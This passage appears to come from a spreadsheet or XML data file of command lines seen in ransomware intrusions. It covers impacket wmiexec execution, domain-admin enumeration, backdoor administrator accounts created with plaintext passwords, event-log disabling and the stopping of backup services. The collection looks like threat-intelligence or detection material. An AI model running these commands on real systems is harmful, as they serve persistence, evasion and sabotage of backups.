    <s v="cmd.exe /q /c query user 1&gt; \\127.0.0.1\admin$\__1698617793[.]44 2&gt;&amp;1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="ransom-eid0771"/>
    <s v="cmd-pid, impacket-pid"/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /q /c cd\ 1&gt; \\127.0.0.1\admin$\__1698617793[.]44 2&gt;&amp;1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="ransom-eid0772"/>
    <s v="cmd-pid, impacket-pid"/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /q /c cd 1&gt; \\127.0.0.1\admin$\__1698617793[.]44 2&gt;&amp;1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17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18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18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18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18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18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18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18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18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18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18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18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18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19"/>
  </r>
  <r>
    <s v="ransom-eid0007"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;domain admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0010"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup administrators"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0011"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Domain Computers&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0012"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /C net group &quot;Domain controllers&quot; /DOMAIN"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0013"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /C net group &quot;domain admins&quot; /DOMAIN"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0014"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /C net localgroup Administrators"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0015"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /C net group /Domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0016"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /C net group &quot;Domain Computers&quot; /DOMAIN"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0083"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net config workstation"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15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5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5"/>
  </r>
  <r>
    <s v="ransom-eid0089"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net  group &quot;domain computers&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15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5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5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5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5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5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5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5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5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5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5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5"/>
  </r>
  <r>
    <s v="ransom-eid0137"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;&quot;domain admins&quot;&quot; /domain "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0138"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;&quot;Domain Computers&quot;&quot; /domain "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0139"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0142"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;domain admins&quot; /domain "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0145"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user &lt;PRIV_USER&gt; /domain "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0147"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view //&lt;IP1&gt;/"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0176"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C net group &quot;domain admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0179"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C net group &quot;enterprise admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0204"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="c:\windows\system32\wevtutil.exe set-log internet explorer /enabled:false"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="ransom-eid0226"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user \\[computer name]  /user:[domain]\[user] [password] /persistent:no"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0235"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user Admin Password1 /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0236"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup Administrators Admin /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0237"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user oldadministrator &quot;qc69t4B#Z0kE3&quot; /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0238"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup Administrators oldadministrator /ADD"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0264"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0265"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0266"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Enterprise Admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0304"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Domain admins&quot; /DOMAIN"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0306"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0307"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0309"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Domain admins&quot; /DOMAIN"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0310"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;enterprise admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0325"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Domain admins&quot; /DOMAIN"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0326"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;enterprise admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0331"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user administrator /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0349"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C net group &quot;enterprise admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0350"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C net group &quot;domain admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0371"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net config workstation"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0374"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0375"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0376"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0385"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup administrators nuuser /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0389"/>
    <s v="netclt-pid"/>
    <s v="Disco Commands From Beacon"/>
    <s v="net config workstation"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0392"/>
    <s v="netclt-pid"/>
    <s v="Disco Commands From Beacon"/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0393"/>
    <s v="netclt-pid"/>
    <s v="Disco Commands From Beacon"/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0399"/>
    <s v="netclt-pid"/>
    <s v="Disco Commands From Beacon"/>
    <s v="cmd /c net group \&quot;Enterprise Admins\&quot;  /domain"/>
    <m/>
    <m/>
    <s v="icjul.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0400"/>
    <s v="netclt-pid"/>
    <s v="Disco Commands From Beacon"/>
    <s v="cmd /c net group \&quot;Domain Admins\&quot; /domain "/>
    <m/>
    <m/>
    <s v="icjul.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0411"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup Administrators"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0433"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="shell net localgroup administrators"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0436"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="shell net group &quot;Enterprise Admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0437"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="shell net group &quot;Domain Computers&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0438"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net computers"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0457"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user OldAdmin 1Q2w3E4r5T6y /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0458"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup Administrators OldAdmin /ADD"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0464"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net start Volume Shadow Copy"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0470"/>
    <s v="netclt-pid"/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="beacon&gt; shell net group &quot;domain admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0471"/>
    <s v="netclt-pid"/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="beacon&gt; shell net user ebernardo /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0474"/>
    <s v="netclt-pid"/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell net view \\172.16.1.40 /ALL"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0497"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup &quot;administrator&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0498"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;domain admins&quot; /dom"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0503"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C net localgroup Administrators"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0516"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user sqlbackup qc69t4b#z0ke3 /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0517"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user localadmin qc69t4b#z0ke3 /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0518"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup administrators localadmin /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0521"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all  "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0522"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0524"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup &quot;administrator&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0525"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;domain admins&quot; /dom "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0528"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Domain Admins&quot; /dom"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0530"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net  localgroup Administrateurs"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0531"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup Administrators"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0540"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net use "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0542"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;domain admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5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5"/>
  </r>
  <r>
    <s v="ransom-eid0560"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /c net localgroup administators"/>
    <s v="rundll32.exe c:\users\&lt;&gt;\appdata\local\temp\37b.dll, entrypoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0564"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0565"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0567"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup &quot;administrator&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0568"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;domain admins&quot; /dom"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0594"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net config workstation"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0597"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0598"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0599"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0601"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /C net group /domain &quot;Domain Computers&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0602"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /C net group /domain &quot;Enterprise Admins&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0636"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user xxx [password] /add /active:yes /expires:never"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0637"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group “Enterprise admins” /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0638"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group “Domain admins” /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0666"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup administrators xxx /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0698"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net session"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0699"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net use"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0702"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0703"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0704"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0708"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net share"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0709"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net view"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0711"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group “Enterprise admins” /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0712"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group “Domain admins” /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0732"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net stop “Acronis VSS Provider” /y"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0733"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net stop “Enterprise Client Service” /y"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0734"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net stop “SQLsafe Backup Service” /y"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0735"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net stop “SQLsafe Filter Service” /y”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0736"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net stop “Veeam Backup Catalog Data Service” /y"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0737"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net stop AcronisAgent /y"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0776"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user"/>
    <m/>
    <m/>
    <s v="tomcat9.exe"/>
    <m/>
    <m/>
    <s v="NETWORK SERVICE"/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0782"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net user &lt;accountname&gt; &lt;password&gt; /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0783"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net localgroup &lt;accountname&gt; /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0790"/>
    <s v="netclt-pid"/>
    <s v="Mistyped"/>
    <s v="net group \&quot;domain admins\&quot; .domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0791"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group \&quot;domain admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0802"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /c net share"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0803"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="cmd.exe /c net use"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0842"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;domain admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0843"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Domain Admins&quot; default /add /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0844"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Enterprise Admins&quot; default /add /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0845"/>
    <s v="netclt-pid"/>
    <m/>
    <s v="net group &quot;Remote Desktop Users&quot; default /add /domain"/>
    <m/>
